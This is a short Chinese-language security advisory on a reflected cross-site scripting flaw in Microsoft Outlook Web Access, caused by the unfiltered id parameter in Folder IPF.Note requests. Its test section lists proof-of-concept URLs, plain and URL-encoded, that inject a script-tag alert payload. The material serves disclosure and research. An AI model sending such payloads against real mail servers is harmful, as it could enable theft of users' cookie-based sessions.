受影响系统:
Microsoft Outlook Web Access 8.2.254.0
描述:
Microsoft Exchange Server是一款流行的邮件服务器,Outlook Web Access是Exchange中用于通过Web浏览器读取和发送邮件的工具。
Outlook Web Access没有正确地过滤在Folder IPF.Note操作中提交给默认URI的id参数,用户受骗跟随了恶意链接就会导致跨站脚本攻击。成功利用这个漏洞的攻击者可以窃取基于Cookie的认证信息。
<*来源:Praveen Darshanam (praveen.recker@sify.com)
链接:http://www.exploit-db.com/exploits/12728
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<
https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
https://example.com/owa/?ae=Folder&t=IPF.Note&id=
https://example.com/owa/?ae=Folder&t=IPF.Note&id=A
建议:
厂商补丁:
Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。